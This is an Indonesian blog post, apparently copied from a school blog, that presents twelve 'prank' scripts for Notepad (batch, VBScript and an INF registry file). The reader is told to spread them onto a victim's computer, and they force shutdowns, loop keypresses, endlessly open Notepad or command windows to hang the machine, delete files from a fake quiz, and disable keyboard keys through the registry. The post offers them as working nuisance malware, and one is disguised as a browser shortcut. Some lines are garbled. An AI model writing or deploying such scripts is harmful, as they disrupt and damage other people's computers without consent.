Trik tips nganar jailin kompi orang

Kumpulan Trik tips jailin komputer orang menggunakan notepad_Cara Hacker Komputer, berikut ini merupakan cara hack komputer yang super jail. dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. berikut langkah-langkahnya : 
jangan dibuat jail yaa



TRIK 1  Membuat Forced Shoutdown
-------------------------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : ihsan.BAT type file : All file 
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN




TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yangberwarna biru di Notepad dengan nama : ihsan.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

TRIK 3 - Membuat Pesan Jail mucul terus 
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih, 
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

------------------------------------------------------

simpan kode script yang berwarna hijau dengan nama ihsan.BAT type file :All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.

TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : ihsan.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis, 

TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
------------------------------------------------------- 
simpan kode berikut di Notepad dengan nama :ihsan.vbs type file : All File
membuat script bermunculan terus menerus

TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
---------------------------------------------------------- 
simpan kode script berikut di Notepad dengan nama : ihsan.vbs type file :All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya

TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "
Komputer Anda Jelek Banget"
loop
----------------------------------------------------------- 
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan diNotepad dengan nama : ihsan.vbs

TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------ 
simpan di Notepad dengan nama : ihsan.BAT
maka Notepad akan terbuka terus menerus

TRIK 9 - Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys ""
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

-----------------------------------------------------------
simpan di Notepad dengan nama : ihsan.vbs 
ganti kode yang berwarna merah sesuai dengan selera anda.

TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top -----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : ihsan.BAT 

TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
------------------------------------------------------------- 

start

start

start

start

start

start

start

start

start

start

start

start
-----------------------------------------------------------
simpan di Notepad dengan nama : ihsan.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target 
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )

TRIK 12 - Cara Mematikan Tombol Keyboard 
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF

Langsung kita mulai saja :

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
AddReg =AIUEO

[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00

—————————————

2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install

3. Log Off komputernya agar trik ini berfungsi.

NB :

Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.

Untuk menormalkannya, silahkan salin script berikut :

—————————————

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
DelReg =normal

[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”

—————————————

—> Simpan dengan nama “NORMAL.INF
Klik kanan file ini, pilih >Install
Log Off komputernya.

Read more: SEM: Trik Tips Hacker Super Jail dengan NotepadSMKN 1 NGA http://smkn1ngasem-deira.blogspot.com/2011/09/trik-tips-hacker-super-jail-dengan.html#ixzz1mW9YEeSe